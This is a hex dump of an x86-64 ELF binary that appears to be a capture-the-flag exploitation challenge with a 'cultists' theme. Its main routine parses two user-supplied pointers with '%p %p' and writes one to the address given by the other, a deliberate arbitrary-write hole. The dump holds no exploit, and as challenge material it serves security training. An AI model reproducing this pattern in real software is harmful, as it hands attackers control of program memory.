00000780: 0700 0000 0600 0000 0000 0000 0000 0000 ................
00000790: 2040 4000 0000 0000 0700 0000 0700 0000 @@.............
000007a0: 0000 0000 0000 0000 2840 4000 0000 0000 ........(@@.....
000007b0: 0700 0000 0800 0000 0000 0000 0000 0000 ................
000007c0: 3040 4000 0000 0000 0700 0000 0900 0000 0@@.............
000007d0: 0000 0000 0000 0000 3840 4000 0000 0000 ........8@@.....
000007e0: 0700 0000 0b00 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000840: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000850: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000860: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000870: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000880: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000890: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000900: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000910: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000920: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000930: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000940: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000950: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000960: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000970: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000980: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000990: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000aa0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ab0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ac0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ad0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ae0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000af0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000b90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ba0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000bb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000bc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000bd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000be0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000bf0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000c90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ca0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000cb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000cc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000cd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ce0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000cf0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000d90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000da0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000db0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000dc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000dd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000de0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000df0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000e90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ea0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000eb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ec0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ed0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ee0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ef0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000f90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000fa0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000fb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000fc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000fd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000fe0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000ff0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001000: f30f 1efa 4883 ec08 488b 05c9 2f00 0048 ....H...H.../..H
00001010: 85c0 7402 ffd0 4883 c408 c300 0000 0000 ..t...H.........
00001020: ff35 ca2f 0000 ff25 cc2f 0000 0f1f 4000 .5./...%./....@.
00001030: ff25 ca2f 0000 6800 0000 00e9 e0ff ffff .%./..h.........
00001040: ff25 c22f 0000 6801 0000 00e9 d0ff ffff .%./..h.........
00001050: ff25 ba2f 0000 6802 0000 00e9 c0ff ffff .%./..h.........
00001060: ff25 b22f 0000 6803 0000 00e9 b0ff ffff .%./..h.........
00001070: ff25 aa2f 0000 6804 0000 00e9 a0ff ffff .%./..h.........
00001080: ff25 a22f 0000 6805 0000 00e9 90ff ffff .%./..h.........
00001090: ff25 9a2f 0000 6806 0000 00e9 80ff ffff .%./..h.........
000010a0: ff25 922f 0000 6807 0000 00e9 70ff ffff .%./..h.....p...
000010b0: f30f 1efa 31ed 4989 d15e 4889 e248 83e4 ....1.I..^H..H..
000010c0: f050 5445 31c0 31c9 48c7 c796 1140 00ff .PTE1.1.H....@..
000010d0: 15f3 2e00 00f4 662e 0f1f 8400 0000 0000 ......f.........
000010e0: f30f 1efa c366 2e0f 1f84 0000 0000 0090 .....f..........
000010f0: b8b0 4240 0048 3db0 4240 0074 1348 8b05 ..B@.H=.B@.t.H..
00001100: cc2e 0000 4885 c074 07bf b042 4000 ffe0 ....H..t...B@...
00001110: c366 662e 0f1f 8400 0000 0000 0f1f 4000 .ff...........@.
00001120: beb0 4240 0048 81ee b042 4000 4889 f048 ..B@.H...B@.H..H
00001130: c1ee 3f48 c1f8 0348 01c6 48d1 fe74 1948 ..?H...H..H..t.H
00001140: 8b05 9a2e 0000 4885 c074 0dbf b042 4000 ......H..t...B@.
00001150: ffe0 660f 1f44 0000 c30f 1f80 0000 0000 ..f..D..........
00001160: f30f 1efa 803d 5d31 0000 0075 1355 4889 .....=]1...u.UH.
00001170: e5e8 7aff ffff c605 4b31 0000 015d c390 ..z.....K1...]..
00001180: c366 662e 0f1f 8400 0000 0000 0f1f 4000 .ff...........@.
00001190: f30f 1efa eb8a 5348 83ec 6064 488b 0425 ......SH..`dH..%
000011a0: 2800 0000 4889 4424 5831 c048 8d3d 560e (...H.D$X1.H.=V.
000011b0: 0000 e8b9 feff ff48 8d5c 2410 488b 15fd .......H.\$.H...
000011c0: 3000 00be 4000 0000 4889 dfe8 b0fe ffff 0...@...H.......
000011d0: be0a 0000 0048 89df e883 feff ff48 85c0 .....H.......H..
000011e0: 7403 c600 0048 8d4c 2408 4889 e248 8d7c t....H.L$.H..H.|
000011f0: 2410 488d 359b 0e00 00b8 0000 0000 e89d $.H.5...........
00001200: feff ff83 f802 7550 488b 0424 488b 5424 ......uPH..$H.T$
00001210: 0848 8910 488d 1d75 2f00 000f be7b 08e8 .H..H..u/....{..
00001220: 0cfe ffff 488b 1b48 85db 75ef 488b 357d ....H..H..u.H.5}
00001230: 3000 00bf 0a00 0000 e853 feff ffb8 0000 0........S......
00001240: 0000 488b 5424 5864 482b 1425 2800 0000 ..H.T$XdH+.%(...
00001250: 7519 4883 c460 5bc3 488d 3df1 0d00 00e8 u.H..`[.H.=.....
00001260: dcfd ffff b801 0000 00eb d7e8 e0fd ffff ................
00001270: f30f 1efa 4883 ec08 4883 c408 c300 0000 ....H...H.......
00001280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000012f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001310: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001320: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001330: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001370: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000013f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001400: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001410: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001420: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001430: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001440: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001450: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001460: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001470: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001480: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001490: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000014f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001500: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001510: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001520: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001530: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001540: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001550: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001560: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001570: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000015f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001600: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001610: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001620: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001630: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001640: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001650: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001660: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001680: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001690: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000016f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001710: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001720: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001730: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001740: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001750: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001760: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001770: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001780: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001790: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000017f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001840: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001850: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001860: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001870: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001880: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001890: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000018f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001900: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001910: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001920: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001930: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001940: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001950: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001960: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001970: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001980: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001990: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000019f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001a90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001aa0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ab0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ac0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ad0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ae0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001af0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001b90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ba0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001bb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001bc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001bd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001be0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001bf0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001c90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ca0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001cb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001cc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001cd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ce0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001cf0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001d90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001da0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001db0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001dc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001dd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001de0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001df0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001e90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ea0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001eb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ec0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ed0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ee0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ef0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f10: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f20: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f30: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f40: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f50: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f70: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f80: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001f90: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001fa0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001fb0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001fc0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001fd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001fe0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00001ff0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002000: 0100 0200 0000 0000 5468 6520 6375 6c74 ........The cult
00002010: 6973 7473 206c 6f6f 6b20 6578 7065 6374 ists look expect
00002020: 616e 746c 7920 746f 2079 6f75 202d 2077 antly to you - w
00002030: 686f 2077 696c 6c20 796f 7520 6c69 6e6b ho will you link
00002040: 2068 616e 6473 2077 6974 683f 2000 0000 hands with? ...
00002050: 596f 7520 6661 696c 2074 6f20 6772 6173 You fail to gras
00002060: 7020 7468 6569 7220 6861 6e64 7320 2d20 p their hands -
00002070: 7468 6579 206c 6f6f 6b20 6174 2079 6f75 they look at you
00002080: 2077 6974 6820 7375 7370 6963 696f 7573 with suspicious
00002090: 2e2e 2e00 2570 2025 7000 0000 011b 033b ....%p %p......;
000020a0: 2800 0000 0400 0000 84ef ffff 6c00 0000 (...........l...
000020b0: 14f0 ffff 4400 0000 44f0 ffff 5800 0000 ....D...D...X...
000020c0: faf0 ffff 9400 0000 1400 0000 0000 0000 ................
000020d0: 017a 5200 0178 1001 1b0c 0708 9001 0000 .zR..x..........
000020e0: 1000 0000 1c00 0000 c8ef ffff 2600 0000 ............&...
000020f0: 0044 0710 1000 0000 3000 0000 e4ef ffff .D......0.......
00002100: 0500 0000 0000 0000 2400 0000 4400 0000 ........$...D...
00002110: 10ef ffff 9000 0000 000e 1046 0e18 4a0f ...........F..J.
00002120: 0b77 0880 003f 1a3b 2a33 2422 0000 0000 .w...?.;*3$"....
00002130: 2000 0000 6c00 0000 5ef0 ffff da00 0000 ...l...^.......
00002140: 0041 0e10 8302 440e 7002 bb0a 0e10 410e .A....D.p.....A.
00002150: 0841 0b00 0000 0000 0000 0000 0000 0000 .A..............
00002160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002170: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002180: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002190: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000021f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002200: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002210: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002220: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002230: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002240: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002250: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002270: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000022f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00002300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
